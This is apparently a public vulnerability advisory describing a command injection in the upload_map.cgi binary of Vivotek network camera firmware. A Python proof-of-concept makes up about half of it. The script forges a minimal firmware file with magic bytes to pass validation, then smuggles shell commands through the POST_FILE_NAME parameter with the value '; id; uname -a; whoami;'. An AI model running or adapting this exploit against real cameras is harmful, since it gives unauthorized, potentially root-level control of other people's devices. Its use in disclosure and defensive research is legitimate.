============================================================================================================================================= | # Title : Vivotek Camera Firmware OS 0100a through 0125c Command Injection in upload_map.cgi via Unsanitized POST_FILE_NAME Parameter | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) | | # Vendor : https://www.vivotek.com/ | ============================================================================================================================================= [+] Summary : A vulnerability classified as Improper Neutralization of Special Elements used in a Command (Command Injection) has been identified in firmware modules used by multiple network camera models from Vivotek. The issue resides in the CGI binary upload_map.cgi, which operates under the Boa Webserver environment. The vulnerability occurs because the application improperly processes the POST_FILE_NAME parameter. This user‑controlled value is passed directly to a system command without proper sanitization or validation. As a result, attackers can inject shell metacharacters (such as ;) within the filename to execute arbitrary operating system commands. A proof‑of‑concept (PoC) demonstrates that an attacker can first create a minimally valid firmware file containing expected magic bytes to bypass basic firmware validation checks. By manipulating the POST_FILE_NAME parameter and injecting additional shell commands, the vulnerable CGI binary executes the injected commands when processing the upload request. Successful exploitation may allow attackers to achieve remote command execution (RCE) on affected devices, potentially with root privileges, leading to full compromise of the camera system. The vulnerability affects numerous camera models and firmware versions, including devices in the FD, FE, IB, IP, IT, MA, MS, and TB product series running firmware versions such as 0100a through 0125c. [+] CVE Identifier: CVE‑2026‑22755 [+] Vulnerability Type: Command Injection [+] Impact: Remote Command Execution (Potential Root Access) [+] POC : import os import subprocess def create_valid_firmware(filename): """ Creates a dummy firmware file containing the required magic bytes to bypass the device's validation check. """ header = b'\xff\x56\xff\xff' padding = b'\x00' * 1000 footer = b'\xff\x4b\xff\xff' with open(filename, 'wb') as f: f.write(header + padding + footer) print(f"[+] Firmware created: {filename} ({os.path.getsize(filename)} bytes)") def run_exploit(): firmware_name = "test_firmware.bin" cgi_path = "/usr/share/www/cgi-bin/upload_map.cgi" create_valid_firmware(firmware_name) payload = f"{firmware_name}; id; uname -a; whoami;" env_vars = os.environ.copy() env_vars.update({ "REQUEST_METHOD": "POST", "CONTENT_LENGTH": str(os.path.getsize(firmware_name)), "QUERY_STRING": "camid=1", "SCRIPT_NAME": "upload_map.cgi", "POST_FILE_NAME": payload }) print(f"[*] Executing exploit via {cgi_path}...") print("-" * 40) try: result = subprocess.run( [cgi_path], env=env_vars, capture_output=True, text=True ) print("[!] Command Execution Output:") print(result.stdout) if result.stderr: print("[!] System Errors/Logs:") print(result.stderr) except FileNotFoundError: print(f"[-] Error: {cgi_path} not found. Ensure the path is correct within the emulated environment.") except Exception as e: print(f"[-] An unexpected error occurred: {e}") if __name__ == "__main__": run_exploit() Greetings to :============================================================================== jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)| ============================================================================================